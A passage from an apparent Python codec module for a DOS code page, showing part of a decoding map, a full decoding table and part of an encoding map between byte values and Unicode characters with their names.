0x00d3: 0x2559, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x00d4: 0x2558, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x00d5: 0x2552, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x00d6: 0x2553, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x00d7: 0x256b, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x00d8: 0x256a, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x03b1, # GREEK SMALL LETTER ALPHA
0x00e1: 0x00df, # LATIN SMALL LETTER SHARP S
0x00e2: 0x0393, # GREEK CAPITAL LETTER GAMMA
0x00e3: 0x03c0, # GREEK SMALL LETTER PI
0x00e4: 0x03a3, # GREEK CAPITAL LETTER SIGMA
0x00e5: 0x03c3, # GREEK SMALL LETTER SIGMA
0x00e6: 0x00b5, # MICRO SIGN
0x00e7: 0x03c4, # GREEK SMALL LETTER TAU
0x00e8: 0x03a6, # GREEK CAPITAL LETTER PHI
0x00e9: 0x0398, # GREEK CAPITAL LETTER THETA
0x00ea: 0x03a9, # GREEK CAPITAL LETTER OMEGA
0x00eb: 0x03b4, # GREEK SMALL LETTER DELTA
0x00ec: 0x221e, # INFINITY
0x00ed: 0x03c6, # GREEK SMALL LETTER PHI
0x00ee: 0x03b5, # GREEK SMALL LETTER EPSILON
0x00ef: 0x2229, # INTERSECTION
0x00f0: 0x2261, # IDENTICAL TO
0x00f1: 0x00b1, # PLUS-MINUS SIGN
0x00f2: 0x2265, # GREATER-THAN OR EQUAL TO
0x00f3: 0x2264, # LESS-THAN OR EQUAL TO
0x00f4: 0x2320, # TOP HALF INTEGRAL
0x00f5: 0x2321, # BOTTOM HALF INTEGRAL
0x00f6: 0x00f7, # DIVISION SIGN
0x00f7: 0x2248, # ALMOST EQUAL TO
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x2219, # BULLET OPERATOR
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x221a, # SQUARE ROOT
0x00fc: 0x207f, # SUPERSCRIPT LATIN SMALL LETTER N
0x00fd: 0x00b2, # SUPERSCRIPT TWO
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Decoding Table
decoding_table = (
'\x00' # 0x0000 -> NULL
'\x01' # 0x0001 -> START OF HEADING
'\x02' # 0x0002 -> START OF TEXT
'\x03' # 0x0003 -> END OF TEXT
'\x04' # 0x0004 -> END OF TRANSMISSION
'\x05' # 0x0005 -> ENQUIRY
'\x06' # 0x0006 -> ACKNOWLEDGE
'\x07' # 0x0007 -> BELL
'\x08' # 0x0008 -> BACKSPACE
'\t' # 0x0009 -> HORIZONTAL TABULATION
'\n' # 0x000a -> LINE FEED
'\x0b' # 0x000b -> VERTICAL TABULATION
'\x0c' # 0x000c -> FORM FEED
'\r' # 0x000d -> CARRIAGE RETURN
'\x0e' # 0x000e -> SHIFT OUT
'\x0f' # 0x000f -> SHIFT IN
'\x10' # 0x0010 -> DATA LINK ESCAPE
'\x11' # 0x0011 -> DEVICE CONTROL ONE
'\x12' # 0x0012 -> DEVICE CONTROL TWO
'\x13' # 0x0013 -> DEVICE CONTROL THREE
'\x14' # 0x0014 -> DEVICE CONTROL FOUR
'\x15' # 0x0015 -> NEGATIVE ACKNOWLEDGE
'\x16' # 0x0016 -> SYNCHRONOUS IDLE
'\x17' # 0x0017 -> END OF TRANSMISSION BLOCK
'\x18' # 0x0018 -> CANCEL
'\x19' # 0x0019 -> END OF MEDIUM
'\x1a' # 0x001a -> SUBSTITUTE
'\x1b' # 0x001b -> ESCAPE
'\x1c' # 0x001c -> FILE SEPARATOR
'\x1d' # 0x001d -> GROUP SEPARATOR
'\x1e' # 0x001e -> RECORD SEPARATOR
'\x1f' # 0x001f -> UNIT SEPARATOR
' ' # 0x0020 -> SPACE
'!' # 0x0021 -> EXCLAMATION MARK
'"' # 0x0022 -> QUOTATION MARK
'#' # 0x0023 -> NUMBER SIGN
'$' # 0x0024 -> DOLLAR SIGN
'%' # 0x0025 -> PERCENT SIGN
'&' # 0x0026 -> AMPERSAND
"'" # 0x0027 -> APOSTROPHE
'(' # 0x0028 -> LEFT PARENTHESIS
')' # 0x0029 -> RIGHT PARENTHESIS
'*' # 0x002a -> ASTERISK
'+' # 0x002b -> PLUS SIGN
',' # 0x002c -> COMMA
'-' # 0x002d -> HYPHEN-MINUS
'.' # 0x002e -> FULL STOP
'/' # 0x002f -> SOLIDUS
'0' # 0x0030 -> DIGIT ZERO
'1' # 0x0031 -> DIGIT ONE
'2' # 0x0032 -> DIGIT TWO
'3' # 0x0033 -> DIGIT THREE
'4' # 0x0034 -> DIGIT FOUR
'5' # 0x0035 -> DIGIT FIVE
'6' # 0x0036 -> DIGIT SIX
'7' # 0x0037 -> DIGIT SEVEN
'8' # 0x0038 -> DIGIT EIGHT
'9' # 0x0039 -> DIGIT NINE
':' # 0x003a -> COLON
';' # 0x003b -> SEMICOLON
'<' # 0x003c -> LESS-THAN SIGN
'=' # 0x003d -> EQUALS SIGN
'>' # 0x003e -> GREATER-THAN SIGN
'?' # 0x003f -> QUESTION MARK
'@' # 0x0040 -> COMMERCIAL AT
'A' # 0x0041 -> LATIN CAPITAL LETTER A
'B' # 0x0042 -> LATIN CAPITAL LETTER B
'C' # 0x0043 -> LATIN CAPITAL LETTER C
'D' # 0x0044 -> LATIN CAPITAL LETTER D
'E' # 0x0045 -> LATIN CAPITAL LETTER E
'F' # 0x0046 -> LATIN CAPITAL LETTER F
'G' # 0x0047 -> LATIN CAPITAL LETTER G
'H' # 0x0048 -> LATIN CAPITAL LETTER H
'I' # 0x0049 -> LATIN CAPITAL LETTER I
'J' # 0x004a -> LATIN CAPITAL LETTER J
'K' # 0x004b -> LATIN CAPITAL LETTER K
'L' # 0x004c -> LATIN CAPITAL LETTER L
'M' # 0x004d -> LATIN CAPITAL LETTER M
'N' # 0x004e -> LATIN CAPITAL LETTER N
'O' # 0x004f -> LATIN CAPITAL LETTER O
'P' # 0x0050 -> LATIN CAPITAL LETTER P
'Q' # 0x0051 -> LATIN CAPITAL LETTER Q
'R' # 0x0052 -> LATIN CAPITAL LETTER R
'S' # 0x0053 -> LATIN CAPITAL LETTER S
'T' # 0x0054 -> LATIN CAPITAL LETTER T
'U' # 0x0055 -> LATIN CAPITAL LETTER U
'V' # 0x0056 -> LATIN CAPITAL LETTER V
'W' # 0x0057 -> LATIN CAPITAL LETTER W
'X' # 0x0058 -> LATIN CAPITAL LETTER X
'Y' # 0x0059 -> LATIN CAPITAL LETTER Y
'Z' # 0x005a -> LATIN CAPITAL LETTER Z
'[' # 0x005b -> LEFT SQUARE BRACKET
'\\' # 0x005c -> REVERSE SOLIDUS
']' # 0x005d -> RIGHT SQUARE BRACKET
'^' # 0x005e -> CIRCUMFLEX ACCENT
'_' # 0x005f -> LOW LINE
'`' # 0x0060 -> GRAVE ACCENT
'a' # 0x0061 -> LATIN SMALL LETTER A
'b' # 0x0062 -> LATIN SMALL LETTER B
'c' # 0x0063 -> LATIN SMALL LETTER C
'd' # 0x0064 -> LATIN SMALL LETTER D
'e' # 0x0065 -> LATIN SMALL LETTER E
'f' # 0x0066 -> LATIN SMALL LETTER F
'g' # 0x0067 -> LATIN SMALL LETTER G
'h' # 0x0068 -> LATIN SMALL LETTER H
'i' # 0x0069 -> LATIN SMALL LETTER I
'j' # 0x006a -> LATIN SMALL LETTER J
'k' # 0x006b -> LATIN SMALL LETTER K
'l' # 0x006c -> LATIN SMALL LETTER L
'm' # 0x006d -> LATIN SMALL LETTER M
'n' # 0x006e -> LATIN SMALL LETTER N
'o' # 0x006f -> LATIN SMALL LETTER O
'p' # 0x0070 -> LATIN SMALL LETTER P
'q' # 0x0071 -> LATIN SMALL LETTER Q
'r' # 0x0072 -> LATIN SMALL LETTER R
's' # 0x0073 -> LATIN SMALL LETTER S
't' # 0x0074 -> LATIN SMALL LETTER T
'u' # 0x0075 -> LATIN SMALL LETTER U
'v' # 0x0076 -> LATIN SMALL LETTER V
'w' # 0x0077 -> LATIN SMALL LETTER W
'x' # 0x0078 -> LATIN SMALL LETTER X
'y' # 0x0079 -> LATIN SMALL LETTER Y
'z' # 0x007a -> LATIN SMALL LETTER Z
'{' # 0x007b -> LEFT CURLY BRACKET
'|' # 0x007c -> VERTICAL LINE
'}' # 0x007d -> RIGHT CURLY BRACKET
'~' # 0x007e -> TILDE
'\x7f' # 0x007f -> DELETE
'\xc7' # 0x0080 -> LATIN CAPITAL LETTER C WITH CEDILLA
'\xfc' # 0x0081 -> LATIN SMALL LETTER U WITH DIAERESIS
'\xe9' # 0x0082 -> LATIN SMALL LETTER E WITH ACUTE
'\xe2' # 0x0083 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
'\xc2' # 0x0084 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
'\xe0' # 0x0085 -> LATIN SMALL LETTER A WITH GRAVE
'\xb6' # 0x0086 -> PILCROW SIGN
'\xe7' # 0x0087 -> LATIN SMALL LETTER C WITH CEDILLA
'\xea' # 0x0088 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
'\xeb' # 0x0089 -> LATIN SMALL LETTER E WITH DIAERESIS
'\xe8' # 0x008a -> LATIN SMALL LETTER E WITH GRAVE
'\xef' # 0x008b -> LATIN SMALL LETTER I WITH DIAERESIS
'\xee' # 0x008c -> LATIN SMALL LETTER I WITH CIRCUMFLEX
'\u2017' # 0x008d -> DOUBLE LOW LINE
'\xc0' # 0x008e -> LATIN CAPITAL LETTER A WITH GRAVE
'\xa7' # 0x008f -> SECTION SIGN
'\xc9' # 0x0090 -> LATIN CAPITAL LETTER E WITH ACUTE
'\xc8' # 0x0091 -> LATIN CAPITAL LETTER E WITH GRAVE
'\xca' # 0x0092 -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
'\xf4' # 0x0093 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
'\xcb' # 0x0094 -> LATIN CAPITAL LETTER E WITH DIAERESIS
'\xcf' # 0x0095 -> LATIN CAPITAL LETTER I WITH DIAERESIS
'\xfb' # 0x0096 -> LATIN SMALL LETTER U WITH CIRCUMFLEX
'\xf9' # 0x0097 -> LATIN SMALL LETTER U WITH GRAVE
'\xa4' # 0x0098 -> CURRENCY SIGN
'\xd4' # 0x0099 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
'\xdc' # 0x009a -> LATIN CAPITAL LETTER U WITH DIAERESIS
'\xa2' # 0x009b -> CENT SIGN
'\xa3' # 0x009c -> POUND SIGN
'\xd9' # 0x009d -> LATIN CAPITAL LETTER U WITH GRAVE
'\xdb' # 0x009e -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
'\u0192' # 0x009f -> LATIN SMALL LETTER F WITH HOOK
'\xa6' # 0x00a0 -> BROKEN BAR
'\xb4' # 0x00a1 -> ACUTE ACCENT
'\xf3' # 0x00a2 -> LATIN SMALL LETTER O WITH ACUTE
'\xfa' # 0x00a3 -> LATIN SMALL LETTER U WITH ACUTE
'\xa8' # 0x00a4 -> DIAERESIS
'\xb8' # 0x00a5 -> CEDILLA
'\xb3' # 0x00a6 -> SUPERSCRIPT THREE
'\xaf' # 0x00a7 -> MACRON
'\xce' # 0x00a8 -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
'\u2310' # 0x00a9 -> REVERSED NOT SIGN
'\xac' # 0x00aa -> NOT SIGN
'\xbd' # 0x00ab -> VULGAR FRACTION ONE HALF
'\xbc' # 0x00ac -> VULGAR FRACTION ONE QUARTER
'\xbe' # 0x00ad -> VULGAR FRACTION THREE QUARTERS
'\xab' # 0x00ae -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
'\xbb' # 0x00af -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
'\u2591' # 0x00b0 -> LIGHT SHADE
'\u2592' # 0x00b1 -> MEDIUM SHADE
'\u2593' # 0x00b2 -> DARK SHADE
'\u2502' # 0x00b3 -> BOX DRAWINGS LIGHT VERTICAL
'\u2524' # 0x00b4 -> BOX DRAWINGS LIGHT VERTICAL AND LEFT
'\u2561' # 0x00b5 -> BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
'\u2562' # 0x00b6 -> BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
'\u2556' # 0x00b7 -> BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
'\u2555' # 0x00b8 -> BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
'\u2563' # 0x00b9 -> BOX DRAWINGS DOUBLE VERTICAL AND LEFT
'\u2551' # 0x00ba -> BOX DRAWINGS DOUBLE VERTICAL
'\u2557' # 0x00bb -> BOX DRAWINGS DOUBLE DOWN AND LEFT
'\u255d' # 0x00bc -> BOX DRAWINGS DOUBLE UP AND LEFT
'\u255c' # 0x00bd -> BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
'\u255b' # 0x00be -> BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
'\u2510' # 0x00bf -> BOX DRAWINGS LIGHT DOWN AND LEFT
'\u2514' # 0x00c0 -> BOX DRAWINGS LIGHT UP AND RIGHT
'\u2534' # 0x00c1 -> BOX DRAWINGS LIGHT UP AND HORIZONTAL
'\u252c' # 0x00c2 -> BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
'\u251c' # 0x00c3 -> BOX DRAWINGS LIGHT VERTICAL AND RIGHT
'\u2500' # 0x00c4 -> BOX DRAWINGS LIGHT HORIZONTAL
'\u253c' # 0x00c5 -> BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
'\u255e' # 0x00c6 -> BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
'\u255f' # 0x00c7 -> BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
'\u255a' # 0x00c8 -> BOX DRAWINGS DOUBLE UP AND RIGHT
'\u2554' # 0x00c9 -> BOX DRAWINGS DOUBLE DOWN AND RIGHT
'\u2569' # 0x00ca -> BOX DRAWINGS DOUBLE UP AND HORIZONTAL
'\u2566' # 0x00cb -> BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
'\u2560' # 0x00cc -> BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
'\u2550' # 0x00cd -> BOX DRAWINGS DOUBLE HORIZONTAL
'\u256c' # 0x00ce -> BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
'\u2567' # 0x00cf -> BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
'\u2568' # 0x00d0 -> BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
'\u2564' # 0x00d1 -> BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
'\u2565' # 0x00d2 -> BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
'\u2559' # 0x00d3 -> BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
'\u2558' # 0x00d4 -> BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
'\u2552' # 0x00d5 -> BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
'\u2553' # 0x00d6 -> BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
'\u256b' # 0x00d7 -> BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
'\u256a' # 0x00d8 -> BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
'\u2518' # 0x00d9 -> BOX DRAWINGS LIGHT UP AND LEFT
'\u250c' # 0x00da -> BOX DRAWINGS LIGHT DOWN AND RIGHT
'\u2588' # 0x00db -> FULL BLOCK
'\u2584' # 0x00dc -> LOWER HALF BLOCK
'\u258c' # 0x00dd -> LEFT HALF BLOCK
'\u2590' # 0x00de -> RIGHT HALF BLOCK
'\u2580' # 0x00df -> UPPER HALF BLOCK
'\u03b1' # 0x00e0 -> GREEK SMALL LETTER ALPHA
'\xdf' # 0x00e1 -> LATIN SMALL LETTER SHARP S
'\u0393' # 0x00e2 -> GREEK CAPITAL LETTER GAMMA
'\u03c0' # 0x00e3 -> GREEK SMALL LETTER PI
'\u03a3' # 0x00e4 -> GREEK CAPITAL LETTER SIGMA
'\u03c3' # 0x00e5 -> GREEK SMALL LETTER SIGMA
'\xb5' # 0x00e6 -> MICRO SIGN
'\u03c4' # 0x00e7 -> GREEK SMALL LETTER TAU
'\u03a6' # 0x00e8 -> GREEK CAPITAL LETTER PHI
'\u0398' # 0x00e9 -> GREEK CAPITAL LETTER THETA
'\u03a9' # 0x00ea -> GREEK CAPITAL LETTER OMEGA
'\u03b4' # 0x00eb -> GREEK SMALL LETTER DELTA
'\u221e' # 0x00ec -> INFINITY
'\u03c6' # 0x00ed -> GREEK SMALL LETTER PHI
'\u03b5' # 0x00ee -> GREEK SMALL LETTER EPSILON
'\u2229' # 0x00ef -> INTERSECTION
'\u2261' # 0x00f0 -> IDENTICAL TO
'\xb1' # 0x00f1 -> PLUS-MINUS SIGN
'\u2265' # 0x00f2 -> GREATER-THAN OR EQUAL TO
'\u2264' # 0x00f3 -> LESS-THAN OR EQUAL TO
'\u2320' # 0x00f4 -> TOP HALF INTEGRAL
'\u2321' # 0x00f5 -> BOTTOM HALF INTEGRAL
'\xf7' # 0x00f6 -> DIVISION SIGN
'\u2248' # 0x00f7 -> ALMOST EQUAL TO
'\xb0' # 0x00f8 -> DEGREE SIGN
'\u2219' # 0x00f9 -> BULLET OPERATOR
'\xb7' # 0x00fa -> MIDDLE DOT
'\u221a' # 0x00fb -> SQUARE ROOT
'\u207f' # 0x00fc -> SUPERSCRIPT LATIN SMALL LETTER N
'\xb2' # 0x00fd -> SUPERSCRIPT TWO
'\u25a0' # 0x00fe -> BLACK SQUARE
'\xa0' # 0x00ff -> NO-BREAK SPACE
)
### Encoding Map
encoding_map = {
0x0000: 0x0000, # NULL
0x0001: 0x0001, # START OF HEADING
0x0002: 0x0002, # START OF TEXT
0x0003: 0x0003, # END OF TEXT
0x0004: 0x0004, # END OF TRANSMISSION
0x0005: 0x0005, # ENQUIRY
0x0006: 0x0006, # ACKNOWLEDGE
0x0007: 0x0007, # BELL
0x0008: 0x0008, # BACKSPACE
0x0009: 0x0009, # HORIZONTAL TABULATION
0x000a: 0x000a, # LINE FEED
0x000b: 0x000b, # VERTICAL TABULATION
0x000c: 0x000c, # FORM FEED
0x000d: 0x000d, # CARRIAGE RETURN
0x000e: 0x000e, # SHIFT OUT
0x000f: 0x000f, # SHIFT IN
0x0010: 0x0010, # DATA LINK ESCAPE
0x0011: 0x0011, # DEVICE CONTROL ONE
0x0012: 0x0012, # DEVICE CONTROL TWO
0x0013: 0x0013, # DEVICE CONTROL THREE
0x0014: 0x0014, # DEVICE CONTROL FOUR
0x0015: 0x0015, # NEGATIVE ACKNOWLEDGE
0x0016: 0x0016, # SYNCHRONOUS IDLE
0x0017: 0x0017, # END OF TRANSMISSION BLOCK
0x0018: 0x0018, # CANCEL
0x0019: 0x0019, # END OF MEDIUM
0x001a: 0x001a, # SUBSTITUTE
0x001b: 0x001b, # ESCAPE
0x001c: 0x001c, # FILE SEPARATOR
0x001d: 0x001d, # GROUP SEPARATOR
0x001e: 0x001e, # RECORD SEPARATOR
0x001f: 0x001f, # UNIT SEPARATOR
0x0020: 0x0020, # SPACE
0x0021: 0x0021, # EXCLAMATION MARK
0x0022: 0x0022, # QUOTATION MARK
0x0023: 0x0023, # NUMBER SIGN
0x0024: 0x0024, # DOLLAR SIGN
0x0025: 0x0025, # PERCENT SIGN
0x0026: 0x0026, # AMPERSAND
0x0027: 0x0027, # APOSTROPHE
0x0028: 0x0028, # LEFT PARENTHESIS
0x0029: 0x0029, # RIGHT PARENTHESIS
0x002a: 0x002a, # ASTERISK
0x002b: 0x002b, # PLUS SIGN
0x002c: 0x002c, # COMMA
0x002d: 0x002d, # HYPHEN-MINUS
0x002e: 0x002e, # FULL STOP
0x002f: 0x002f, # SOLIDUS
0x0030: 0x0030, # DIGIT ZERO
0x0031: 0x0031, # DIGIT ONE
0x0032: 0x0032, # DIGIT TWO
0x0033: 0x0033, # DIGIT THREE
0x0034: 0x0034, # DIGIT FOUR
0x0035: 0x0035, # DIGIT FIVE
0x0036: 0x0036, # DIGIT SIX
0x0037: 0x0037, # DIGIT SEVEN
0x0038: 0x0038, # DIGIT EIGHT
0x0039: 0x0039, # DIGIT NINE
0x003a: 0x003a, # COLON
0x003b: 0x003b, # SEMICOLON
0x003c: 0x003c, # LESS-THAN SIGN
0x003d: 0x003d, # EQUALS SIGN
0x003e: 0x003e, # GREATER-THAN SIGN
0x003f: 0x003f, # QUESTION MARK
0x0040: 0x0040, # COMMERCIAL AT
0x0041: 0x0041, # LATIN CAPITAL LETTER A
0x0042: 0x0042, # LATIN CAPITAL LETTER B
0x0043: 0x0043, # LATIN CAPITAL LETTER C
0x0044: 0x0044, # LATIN CAPITAL LETTER D
0x0045: 0x0045, # LATIN CAPITAL LETTER E
0x0046: 0x0046, # LATIN CAPITAL LETTER F
0x0047: 0x0047, # LATIN CAPITAL LETTER G
0x0048: 0x0048, # LATIN CAPITAL LETTER H
0x0049: 0x0049, # LATIN CAPITAL LETTER I
0x004a: 0x004a, # LATIN CAPITAL LETTER J
0x004b: 0x004b, # LATIN CAPITAL LETTER K
0x004c: 0x004c, # LATIN CAPITAL LETTER L
0x004d: 0x004d, # LATIN CAPITAL LETTER M
0x004e: 0x004e, # LATIN CAPITAL LETTER N
0x004f: 0x004f, # LATIN CAPITAL LETTER O
0x0050: 0x0050, # LATIN CAPITAL LETTER P
0x0051: 0x0051, # LATIN CAPITAL LETTER Q
0x0052: 0x0052, # LATIN CAPITAL LETTER R
0x0053: 0x0053, # LATIN CAPITAL LETTER S
0x0054: 0x0054, # LATIN CAPITAL LETTER T
0x0055: 0x0055, # LATIN CAPITAL LETTER U
0x0056: 0x0056, # LATIN CAPITAL LETTER V
0x0057: 0x0057, # LATIN CAPITAL LETTER W
0x0058: 0x0058, # LATIN CAPITAL LETTER X
0x0059: 0x0059, # LATIN CAPITAL LETTER Y
0x005a: 0x005a, # LATIN CAPITAL LETTER Z
0x005b: 0x005b, # LEFT SQUARE BRACKET
0x005c: 0x005c, # REVERSE SOLIDUS
0x005d: 0x005d, # RIGHT SQUARE BRACKET
0x005e: 0x005e, # CIRCUMFLEX ACCENT
0x005f: 0x005f, # LOW LINE
0x0060: 0x0060, # GRAVE ACCENT
0x0061: 0x0061, # LATIN SMALL LETTER A
0x0062: 0x0062, # LATIN SMALL LETTER B
0x0063: 0x0063, # LATIN SMALL LETTER C
0x0064: 0x0064, # LATIN SMALL LETTER D
0x0065: 0x0065, # LATIN SMALL LETTER E
0x0066: 0x0066, # LATIN SMALL LETTER F
0x0067: 0x0067, # LATIN SMALL LETTER G
0x0068: 0x0068, # LATIN SMALL LETTER H
0x0069: 0x0069, # LATIN SMALL LETTER I
0x006a: 0x006a, # LATIN SMALL LETTER J
0x006b: 0x006b, # LATIN SMALL LETTER K
0x006c: 0x006c, # LATIN SMALL LETTER L
0x006d: 0x006d, # LATIN SMALL LETTER M
0x006e: 0x006e, # LATIN SMALL LETTER N
0x006f: 0x006f, # LATIN SMALL LETTER O
0x0070: 0x0070, # LATIN SMALL LETTER P
0x0071: 0x0071, # LATIN SMALL LETTER Q
0x0072: 0x0072, # LATIN SMALL LETTER R
0x0073: 0x0073, # LATIN SMALL LETTER S
0x0074: 0x0074, # LATIN SMALL LETTER T
0x0075: 0x0075, # LATIN SMALL LETTER U
0x0076: 0x0076, # LATIN SMALL LETTER V
0x0077: 0x0077, # LATIN SMALL LETTER W
0x0078: 0x0078, # LATIN SMALL LETTER X
0x0079: 0x0079, # LATIN SMALL LETTER Y
0x007a: 0x007a, # LATIN SMALL LETTER Z
0x007b: 0x007b, # LEFT CURLY BRACKET
0x007c: 0x007c, # VERTICAL LINE
0x007d: 0x007d, # RIGHT CURLY BRACKET
0x007e: 0x007e, # TILDE
0x007f: 0x007f, # DELETE
0x00a0: 0x00ff, # NO-BREAK SPACE
0x00a2: 0x009b, # CENT SIGN
0x00a3: 0x009c, # POUND SIGN
0x00a4: 0x0098, # CURRENCY SIGN
0x00a6: 0x00a0, # BROKEN BAR
0x00a7: 0x008f, # SECTION SIGN
0x00a8: 0x00a4, # DIAERESIS
0x00ab: 0x00ae, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00ac: 0x00aa, # NOT SIGN
0x00af: 0x00a7, # MACRON
0x00b0: 0x00f8, # DEGREE SIGN
0x00b1: 0x00f1, # PLUS-MINUS SIGN
0x00b2: 0x00fd, # SUPERSCRIPT TWO
0x00b3: 0x00a6, # SUPERSCRIPT THREE
0x00b4: 0x00a1, # ACUTE ACCENT
0x00b5: 0x00e6, # MICRO SIGN
0x00b6: 0x0086, # PILCROW SIGN
0x00b7: 0x00fa, # MIDDLE DOT
0x00b8: 0x00a5, # CEDILLA
0x00bb: 0x00af, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00bc: 0x00ac, # VULGAR FRACTION ONE QUARTER
0x00bd: 0x00ab, # VULGAR FRACTION ONE HALF
0x00be: 0x00ad, # VULGAR FRACTION THREE QUARTERS
0x00c0: 0x008e, # LATIN CAPITAL LETTER A WITH GRAVE
0x00c2: 0x0084, # LATIN CAPITAL LETTER A WITH CIRCUMFLEX
0x00c7: 0x0080, # LATIN CAPITAL LETTER C WITH CEDILLA
0x00c8: 0x0091, # LATIN CAPITAL LETTER E WITH GRAVE
0x00c9: 0x0090, # LATIN CAPITAL LETTER E WITH ACUTE
0x00ca: 0x0092, # LATIN CAPITAL LETTER E WITH CIRCUMFLEX
0x00cb: 0x0094, # LATIN CAPITAL LETTER E WITH DIAERESIS
0x00ce: 0x00a8, # LATIN CAPITAL LETTER I WITH CIRCUMFLEX
0x00cf: 0x0095, # LATIN CAPITAL LETTER I WITH DIAERESIS
0x00d4: 0x0099, # LATIN CAPITAL LETTER O WITH CIRCUMFLEX
0x00d9: 0x009d, # LATIN CAPITAL LETTER U WITH GRAVE
0x00db: 0x009e, # LATIN CAPITAL LETTER U WITH CIRCUMFLEX
0x00dc: 0x009a, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x00df: 0x00e1, # LATIN SMALL LETTER SHARP S
0x00e0: 0x0085, # LATIN SMALL LETTER A WITH GRAVE
0x00e2: 0x0083, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x00e7: 0x0087, # LATIN SMALL LETTER C WITH CEDILLA
0x00e8: 0x008a, # LATIN SMALL LETTER E WITH GRAVE
0x00e9: 0x0082, # LATIN SMALL LETTER E WITH ACUTE
0x00ea: 0x0088, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x00eb: 0x0089, # LATIN SMALL LETTER E WITH DIAERESIS
0x00ee: 0x008c, # LATIN SMALL LETTER I WITH CIRCUMFLEX
0x00ef: 0x008b, # LATIN SMALL LETTER I WITH DIAERESIS
0x00f3: 0x00a2, # LATIN SMALL LETTER O WITH ACUTE
0x00f4: 0x0093, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x00f7: 0x00f6, # DIVISION SIGN
0x00f9: 0x0097, # LATIN SMALL LETTER U WITH GRAVE
0x00fa: 0x00a3, # LATIN SMALL LETTER U WITH ACUTE
0x00fb: 0x0096, # LATIN SMALL LETTER U WITH CIRCUMFLEX
0x00fc: 0x0081, # LATIN SMALL LETTER U WITH DIAERESIS
0x0192: 0x009f, # LATIN SMALL LETTER F WITH HOOK
0x0393: 0x00e2, # GREEK CAPITAL LETTER GAMMA
0x0398: 0x00e9, # GREEK CAPITAL LETTER THETA
0x03a3: 0x00e4, # GREEK CAPITAL LETTER SIGMA
0x03a6: 0x00e8, # GREEK CAPITAL LETTER PHI
0x03a9: 0x00ea, # GREEK CAPITAL LETTER OMEGA
0x03b1: 0x00e0, # GREEK SMALL LETTER ALPHA
0x03b4: 0x00eb, # GREEK SMALL LETTER DELTA
0x03b5: 0x00ee, # GREEK SMALL LETTER EPSILON
0x03c0: 0x00e3, # GREEK SMALL LETTER PI
0x03c3: 0x00e5, # GREEK SMALL LETTER SIGMA
0x03c4: 0x00e7, # GREEK SMALL LETTER TAU
0x03c6: 0x00ed, # GREEK SMALL LETTER PHI
0x2017: 0x008d, # DOUBLE LOW LINE
0x207f: 0x00fc, # SUPERSCRIPT LATIN SMALL LETTER N
0x2219: 0x00f9, # BULLET OPERATOR
0x221a: 0x00fb, # SQUARE ROOT
0x221e: 0x00ec, # INFINITY
0x2229: 0x00ef, # INTERSECTION
0x2248: 0x00f7, # ALMOST EQUAL TO
0x2261: 0x00f0, # IDENTICAL TO
0x2264: 0x00f3, # LESS-THAN OR EQUAL TO
0x2265: 0x00f2, # GREATER-THAN OR EQUAL TO
0x2310: 0x00a9, # REVERSED NOT SIGN
0x2320: 0x00f4, # TOP HALF INTEGRAL
0x2321: 0x00f5, # BOTTOM HALF INTEGRAL
0x2500: 0x00c4, # BOX DRAWINGS LIGHT HORIZONTAL
0x2502: 0x00b3, # BOX DRAWINGS LIGHT VERTICAL
0x250c: 0x00da, # BOX DRAWINGS LIGHT DOWN AND RIGHT
